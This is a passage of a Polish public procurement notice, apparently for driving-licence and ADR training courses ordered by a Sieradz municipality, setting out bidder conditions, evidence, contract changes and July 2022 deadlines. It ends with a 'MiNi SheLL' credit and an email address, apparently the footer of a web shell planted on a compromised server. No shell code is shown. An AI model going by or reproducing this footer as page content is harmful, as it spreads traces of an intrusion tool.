lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>a) uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający wymaga, aby Wykonawca posiadał:<br/>dla części 1 zamówienia:<br/>- wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę<br/>instytucji szkoleniowej, zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku<br/>pracy (Dz. U. z 2022 r., poz. 690) - dalej u.p.z.i.,<br/>- wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców prowadzonego przez starostę właściwego ze<br/>względu na miejsce wykonywania działalności objętej wpisem, zgodnie z art. 28 u.k.p.,<br/>dla części 2 zamówienia:<br/>- wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę<br/>instytucji szkoleniowej, zgodnie z art. 20 ust. 1 u.p.z.i.,<br/>- wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców, prowadzonego przez wojewodę właściwego<br/>ze względu na miejsce wykonywania działalności objętej wpisem, zgodnie z art. 39g ustawy z dnia 6 września 2001 r. o<br/>transporcie drogowym (Dz. U. z 2022 r. poz. 180 z późniejszymi zmianami) - dalej u.t.d.,<br/>- wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców prowadzonego przez starostę właściwego ze<br/>względu na miejsce wykonywania działalności objętej wpisem, zgodnie z art. 28 u.k.p.<br/>b) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej:<br/>dla części 1 zamówienia:<br/>- 1 osobą posiadającą uprawnienia instruktorskie nauki jazdy kategorii B, co najmniej 5 letnie doświadczenie zawodowe w<br/>zakresie szkoleń na prawo jazdy kat. B, w tym obejmujące przeprowadzenie szkoleń na prawo jazdy kat. B w wymiarze co najmniej 100 godzin w okresie ostatnich 3 lat przed upływem terminu składania ofert.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek zostanie uznany za spełniony, gdy co<br/>najmniej jeden z nich wykaże się dysponowaniem wymaganą osobą,<br/>- dysponuje co najmniej 2 pojazdami spełniającymi wymogi bezpieczeństwa jazdy, przystosowanymi do nauki jazdy, do<br/>prowadzenia zajęć praktycznych kursów prawa jazdy kat. B.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek zostanie uznany za spełniony, gdy co najmniej jeden z nich wykaże się dysponowaniem wymaganymi pojazdami.<br/>dla części 2 zamówienia:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej:<br/>- 1 osobą posiadającą uprawnienia instruktorskie nauki jazdy kategorii C, co najmniej 5 letnie doświadczenie zawodowe w<br/>zakresie szkoleń na prawo jazdy kat. C, w tym obejmujące przeprowadzenie szkoleń na prawo jazdy kat. C w wymiarze co<br/>najmniej 120 godzin w okresie ostatnich 3 lat przed upływem terminu składania ofert,<br/>- 1 osobą posiadającą uprawnienia instruktorskie nauki jazdy kategorii C+E, co najmniej 5 letnie doświadczenie zawodowe<br/>w zakresie szkoleń na prawo jazdy kat. C+E, w tym obejmujące przeprowadzenie szkoleń na prawo jazdy kat. C+E w<br/>wymiarze co najmniej 75 godzin w okresie ostatnich 3 lat przed upływem terminu składania ofert,<br/>- 1 osobą posiadającą co najmniej 5 letnie doświadczenie zawodowe w dziedzinie objętej tematyką szkolenia w zakresie<br/>kwalifikacji wstępnej przyspieszonej, w tym obejmujące przeprowadzenie szkoleń z zakresu kwalifikacji wstępnej<br/>przyspieszonej w wymiarze co najmniej 420 godzin w okresie ostatnich 3 lat przed upływem terminu składania ofert,<br/>- 1 osobą posiadającą certyfikat trenera – wykładowcy ADR lub świadectwo doradcy do spraw bezpieczeństwa przewozu<br/>towarów niebezpiecznych w zakresie przewozu drogowego towarów niebezpiecznych, co najmniej 5 letnie doświadczenie<br/>zawodowe w zakresie szkoleń z zakresu ADR, w tym obejmujące przeprowadzenie szkoleń z zakresu ADR w wymiarze co<br/>najmniej 120 godzin w okresie ostatnich 3 lat przed upływem terminu składania ofert.<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunek zostanie uznany za spełniony, gdy<br/>Wykonawcy łącznie wykażą się dysponowaniem wymaganymi osobami. Zamawiający wyraża zgodę, by w celu wykazania<br/>spełnienia niniejszego warunku Wykonawca wskazał tą samą osobę do pełnienia więcej niż jednej funkcji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu u.o.k.k., z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej (załącznik nr 5 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wymaga złożenia:<br/>a) dla części 1 zamówienia:<br/>- aktualnego wpisu do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców prowadzonego przez starostę<br/>właściwego ze względu na miejsce wykonywania działalności objętej wpisem, zgodnie z art. 28 u.k.p.<br/>W zakresie wpisu do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy, Zamawiający dokona oceny<br/>spełniania przez Wykonawcę powyższego warunku w oparciu o dane zawarte w publicznym rejestrze upublicznionym pod adresem:<br/>http://stor.praca.gov.pl/portal/#/ris/wyszukiwarka<br/>Zamawiający uzna, że Wykonawca spełnia powyższy warunek w sytuacji, gdy w Rejestrze Instytucji Szkoleniowych dostępnym pod<br/>wskazanym powyżej adresem znajdować się będą dane Wykonawcy wskazujące, że kontynuuje on działalność szkoleniową w<br/>danym roku kalendarzowym.<br/>a)dla części 2 zamówienia:<br/>- aktualnego wpisu do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców prowadzonego przez wojewodę<br/>właściwego ze względu na miejsce wykonywania działalności objętej wpisem, zgodnie z art. 39g u.t.d.,<br/>- aktualnego wpisu do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców prowadzonego przez starostę<br/>właściwego ze względu na miejsce wykonywania działalności objętej wpisem, zgodnie z art. 28 u.k.p.<br/>W zakresie wpisu do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy, Zamawiający dokona oceny<br/>spełniania przez Wykonawcę powyższego warunku w oparciu o dane zawarte w publicznym rejestrze upublicznionym pod adresem:<br/>http://stor.praca.gov.pl/portal/#/ris/wyszukiwarka<br/>Zamawiający uzna, że Wykonawca spełnia powyższy warunek w sytuacji, gdy w Rejestrze Instytucji Szkoleniowych dostępnym pod<br/>wskazanym powyżej adresem znajdować się będą dane Wykonawcy wskazujące, że kontynuuje on działalność szkoleniową w<br/>danym roku kalendarzowym.<br/>b)dla części 1 i 2 zamówienia:<br/>- wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami.<br/>Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego dla części nr 1 należy sporządzić wg załącznika<br/>nr 4.<br/>Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego dla części nr 2 należy sporządzić wg załącznika<br/>nr 4a.<br/>c)dla części 1 zamówienia:<br/>- wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.<br/>Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dla części nr 1 należy sporządzić wg załącznika nr 4b.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>- oświadczenie o niepodleganiu wykluczeniu stanowiące załącznik nr 3 do SWZ, składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie,<br/>- oświadczenie o spełnianiu warunków udziału w postępowaniu stanowiące załącznik nr 3a do SWZ, składa ten Wykonawca,<br/>który potwierdza spełnianie warunków udziału w postępowaniu w zakresie, w jakim on sam wykazuje spełnianie warunków<br/>udziału w postępowaniu,<br/>- oświadczenie, o którym mowa w rozdziale XI pkt 2 ppkt 1 lit. a) składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie,<br/>- wpisy i wykazy, o których mowa w rozdziale XI pkt 2 ppkt 2 składa Wykonawca, który potwierdza spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim on sam wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, brak podstaw do wykluczenia z<br/>postępowania powinien wykazać każdy z Wykonawców.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Zaleca się, aby pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Pełnomocnictwo należy załączyć do oferty:<br/>a) w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez<br/>osobę/osoby udzielające pełnomocnictwa, lub<br/>b) w przypadku, gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym<br/>podpisem – jako cyfrowe odwzorowanie tego dokumentu, opatrzone podpisem zaufanym lub podpisem osobistym przez<br/>mocodawcę/ów lub kwalifikowanym podpisem elektronicznym notariusza, poświadczającymi zgodność cyfrowego<br/>odwzorowania z dokumentem w postaci elektronicznej.<br/>4. Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana Zamawiający może żądać przed<br/>zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców.<br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, którzy polegają na zdolnościach tych z Wykonawców,<br/>którzy wykonają usługi, do realizacji których te zdolności są wymagane, zobowiązani dołączyć do oferty oświadczenie,<br/>stanowiące załącznik nr 6 do SWZ, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>6. Wykonawcy składają oświadczenie, o którym mowa w pkt 5:<br/>a) w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osoby<br/>upoważnione do reprezentowania Wykonawcy, lub<br/>b) w przypadku, gdy oświadczenie zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym<br/>podpisem – jako cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym przez osoby upoważnione do reprezentowania Wykonawcy, poświadczającym zgodność<br/>cyfrowego odwzorowania z dokumentem w postacie elektronicznej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wzór umowy stanowią załączniki nr 2 i 2a do niniejszej SWZ:<br/>a) załącznik nr 2 dotyczy części nr 1 zamówienia,<br/>b) załącznik nr 2a dotyczy części nr 2 zamówienia.<br/>2. Strony zastrzegają możliwość dokonania w uzasadnionych okolicznościach zmian postanowień zawartej umowy.<br/>Wszelkie zmiany treści umowy wymagają pod rygorem nieważności zachowania formy pisemnej.<br/>3. Zmiana określenia przedmiotu zamówienia w porównaniu do postanowień SWZ w postępowaniu o udzielenie zamówienia<br/>publicznego, w wyniku przeprowadzenia którego zawarto niniejszą umowę możliwa jest jedynie w przypadku gdy prowadzi<br/>do jego ograniczenia lub zastosowania rozwiązań zamiennych, tj. takich, które nie powodują rozszerzenia określenia<br/>przedmiotu zamówienia, prowadzą do jego ulepszenia, usprawnienia jego realizacji lub zastosowania materiałów równoważnych.<br/>4. Zamawiający przewiduje możliwość zmiany wynagrodzenia umownego:<br/>a) w przypadkach i na warunkach określonych w 3 ust. 2-3 załącznika nr 2 i 2a do SWZ,<br/>b) zmiany stawki podatku od towarów, z tym zastrzeżeniem, że wartość netto wynagrodzenia Wykonawcy nie zmieni się, a<br/>wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów;<br/>5. Zamawiający przewiduje możliwość zmian postanowień niniejszej umowy w przypadkach określonych w art. 455 ustawy<br/>Pzp.<br/>6. Zamawiający przewiduje możliwość zmian umowy, w przypadku wystąpienia niżej wymienionych okoliczności<br/>niezależnych od stron umowy:<br/>a) w przypadku, gdy Wykonawca zamierza powierzyć część zamówienia Podwykonawcy w trakcie wykonywania usług –<br/>poprzez wskazanie tej części zamówienia oraz danych Podwykonawcy,<br/>b) w przypadku zmiany albo rezygnacji z Podwykonawcy, którego Wykonawca wskazał na etapie składania oferty poprzez<br/>zmianę danych Podwykonawcy.<br/>7. Zamawiający przewiduje możliwość zmiany terminu wykonania umowy, w przypadku wystąpienia okoliczności<br/>niezależnych od stron umowy:<br/>a) zmiany przez instytucję zarządzającą terminu realizacji Projektu,<br/>b) związanych z wystąpieniem siły wyższej.<br/>8. W przypadku konieczności zmiany wskazanych przez Wykonawcę w ofercie osób uczestniczących w wykonywaniu<br/>zamówienia, Wykonawca może dokonać zmiany w tym zakresie, pod warunkiem zachowania warunków dotyczących<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia określonych w<br/>SWZ oraz zawiadomienia Zamawiającego o powyższej zmianie z co najmniej 7 dniowym wyprzedzeniem. Zmiana w tym<br/>zakresie wymaga zawarcia aneksu do umowy, jeżeli dotyczy osób wymienionych w treści umowy.<br/>9. Każda ze stron może wystąpić z propozycją zmian postanowień niniejszej umowy. Propozycja musi wskazywać na<br/>okoliczności uzasadniające wprowadzenie zmian.<br/>10. Strony ustalają, że Wykonawca nie może bez zgody Zamawiającego dokonać cesji wierzytelności na rzecz osoby<br/>trzeciej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gmsieradz.e-zp.finn.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-05 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com